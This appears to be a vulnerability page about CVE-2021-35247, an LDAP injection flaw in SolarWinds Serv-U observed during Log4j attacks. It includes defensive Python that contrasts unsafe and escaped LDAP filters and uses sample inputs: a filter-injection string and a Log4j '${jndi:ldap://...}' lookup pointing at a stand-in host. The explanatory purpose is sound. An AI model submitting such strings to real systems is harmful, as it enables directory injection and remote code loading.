CVSS2
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score
Confidence: High

EPSS
Percentile: 99.7%
Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.
This is a confusing story: Initially, Microsoft had warned on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks’ internal devices via the SolarWinds bug.
SolarWinds had issued a fix the day before, on Tuesday.
SolarWinds subsequently reached out to Threatpost and other news outlets on Thursday to clarify that Microsoft’s report referred to a threat actor attempting to log in to Serv-U using the Log4j vulnerability. The attempt failed, given that Serv-U doesn’t use Log4j code and the target for authentication – LDAP (Microsoft Active Directory) – isn’t susceptible to Log4j attacks.
The SolarWinds vulnerability, tracked as CVE-2021-35247, is an input validation flaw that could allow attackers to build a query, given some input, and to send that query over the network without sanitation, Microsoft’s Threat Intelligence Center (MSTIC) said.
The bug, discovered by Microsoft’s Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior. SolarWinds fixed the vulnerability in Serv-U version 15.3, released on Tuesday.
“The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized,” SolarWinds said in its advisory, adding that it had updated the input mechanism “to perform additional validation and sanitization.”
Microsoft security researcher Jonathan Bar Or, credited with discovering the bug, explained that he had seen attacks coming from serv-u.exe while hunting for log4j exploit attempts. “Taking a closer look revealed you could feed Serv-U with data and it’ll build an LDAP query with your unsanitized input!” he said. “This could be used for log4j attack attempts, but also for LDAP injection.”
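The defect described above is a classic LDAP injection shape: a login field is concatenated into an LDAP search filter without escaping, so filter metacharacters in the input can change the structure of the query. The block below is an added illustration written for this page, not Serv-U's code or SolarWinds' fix. It assumes a hypothetical filter of the form `(&(objectClass=user)(sAMAccountName=...))`, shows the unsafe concatenation beside an RFC 4515 escaping routine, and uses a small structural check (counting unescaped parentheses) to show that the hardened builder keeps the filter's shape regardless of input. It also shows why escaping alone does not "neutralize" a Log4j-style `${jndi:...}` string: that string contains no LDAP filter metacharacters, which is consistent with the advisory's point that the LDAP servers simply ignored it.

```python
"""LDAP filter construction: unsafe concatenation vs. RFC 4515 escaping.

Added example for this page; names and the filter template are assumptions,
not Serv-U internals.
"""

# RFC 4515 section 3: these characters must be escaped inside an assertion
# value as a backslash followed by two hex digits.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

# Hypothetical filter template used by a login handler (assumption).
_TEMPLATE = "(&(objectClass=user)(sAMAccountName={username}))"


def escape_ldap_filter_value(value: str) -> str:
    """Escape a string for safe use as an LDAP filter assertion value.

    A single pass over the input is sufficient: each character is mapped
    independently, so the backslash introduced by one escape is never
    re-escaped.
    """
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username: str) -> str:
    """The vulnerable pattern: raw input dropped into the filter."""
    return _TEMPLATE.format(username=username)


def build_filter_safe(username: str) -> str:
    """The hardened pattern: input escaped before it reaches the filter."""
    return _TEMPLATE.format(username=escape_ldap_filter_value(username))


def count_unescaped(filter_str: str, ch: str) -> int:
    """Count occurrences of `ch` that are not part of a \\XX escape.

    Used here as a cheap structural check: the template has exactly three
    '(' characters, so any other count means user input altered the query.
    """
    n = 0
    i = 0
    while i < len(filter_str):
        if filter_str[i] == "\\":
            i += 3  # skip the escape sequence \XX
            continue
        if filter_str[i] == ch:
            n += 1
        i += 1
    return n


EXPECTED_OPEN_PARENS = count_unescaped(_TEMPLATE, "(")  # 3 for the template above


def filter_is_intact(filter_str: str) -> bool:
    """True if the filter still has the template's structure."""
    return count_unescaped(filter_str, "(") == EXPECTED_OPEN_PARENS


if __name__ == "__main__":
    # Constructed sample inputs (not captured traffic).
    injected = "jsmith*)(objectClass=*"          # filter metacharacters
    jndi_style = "${jndi:ldap://example.invalid/a}"  # Log4j lookup syntax

    for label, value in (("injected", injected), ("jndi-style", jndi_style)):
        unsafe = build_filter_unsafe(value)
        safe = build_filter_safe(value)
        print(f"{label:10} unsafe intact={filter_is_intact(unsafe)!s:5} {unsafe}")
        print(f"{label:10} safe   intact={filter_is_intact(safe)!s:5} {safe}")
```

Note what the second input demonstrates: the escaped and unescaped forms of a `${jndi:...}` string are identical, because `$`, `{`, `:` and `/` are not filter metacharacters. Filter escaping is the right fix for the LDAP injection class, but it is not what protects an environment from Log4j lookups; that protection has to come from the logging library and any downstream components that log the username.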
A SolarWinds representative told Threatpost that the attacker wasn’t able to log in to Serv-U, and that the Microsoft researcher was referencing attempted logins that failed, since Serv-U doesn’t leverage Log4j code.
SolarWinds said that it hasn’t seen any “downstream [effect]” of the bug, given that “the LDAP servers ignored improper characters.”
For its part, MSTIC didn’t give details about the attack it observed.
The Serv-U attacks are just the latest in the rampant Log4j exploit attempts and testing that have been thrown at the multiple flaws in Apache’s Log4j logging library since those flaws were disclosed – and came under near-immediate attack – last month.
On Tuesday, Akamai researchers also reported that they’ve detected evidence of the unauthenticated remote code execution (RCE) vulnerability in Log4j – tracked as CVE-2021-44228 – being adapted to infect and assist in the proliferation of malware used by the Mirai botnet by targeting Zyxel networking devices.
MSTIC strongly recommended that affected customers apply the SolarWinds security updates.
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247
threatpost.com/gafgyt-botnet-ddos-mirai/165424/
threatpost.com/log4j-vulnerability-pressures-security-world/177721/
threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/
threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/
twitter.com/yo_yo_yo_jbo/status/1483951175997149184
www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability
www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#CVE-2021-35247
www.solarwinds.com/trust-center/security-advisories/cve-2021-35247
www.zyxel.com/us/en/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml